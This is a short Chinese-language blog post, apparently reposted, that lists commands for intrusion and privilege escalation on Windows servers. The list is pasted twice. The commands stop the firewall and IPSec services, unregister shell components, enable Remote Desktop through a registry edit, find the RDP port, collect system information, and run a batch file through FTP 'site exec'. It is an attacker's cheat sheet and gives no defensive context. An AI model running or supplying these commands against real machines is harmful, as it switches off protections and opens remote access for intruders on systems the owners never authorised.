常用入侵提权指令
//恢復(fù)3389
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll //停掉服務(wù)器防火墻和IPSEC Services
net stop sharedaccess
net stop policyagent
//查看將3389改成了什么端口方法一
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>a.txt //查看將3389改成了什么端口方法二
tasklist /svc>>jilu.txt
netstat /ano>>jilu2.txt
//允許電腦遠(yuǎn)程連接桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //查看系統(tǒng)版本等信息并寫入文本
systeminfo>>"info.txt" //查看3389端口是否開啟
netstat -ano -p tcp | find "3389" >nul 2>nul && echo 3389端口開啟!|| echo 3389未開啟!>>"是否開啟.txt" //FTP下運(yùn)行指定的程序
quote site exec aaa.bat
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll //停掉服務(wù)器防火墻和IPSEC Services
net stop sharedaccess
net stop policyagent
//查看將3389改成了什么端口方法一
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>a.txt //查看將3389改成了什么端口方法二
tasklist /svc>>jilu.txt
netstat /ano>>jilu2.txt
//允許電腦遠(yuǎn)程連接桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //查看系統(tǒng)版本等信息并寫入文本
systeminfo>>"info.txt" //查看3389端口是否開啟
netstat -ano -p tcp | find "3389" >nul 2>nul && echo 3389端口開啟!|| echo 3389未開啟!>>"是否開啟.txt" //FTP下運(yùn)行指定的程序
quote site exec aaa.bat
轉(zhuǎn)載于:https://www.cnblogs.com/fuhua/p/5877793.html
總結(jié)
- 上一篇: 【NOIP2012模拟10.20】友好数
- 下一篇: 最近关于less sass的新手总结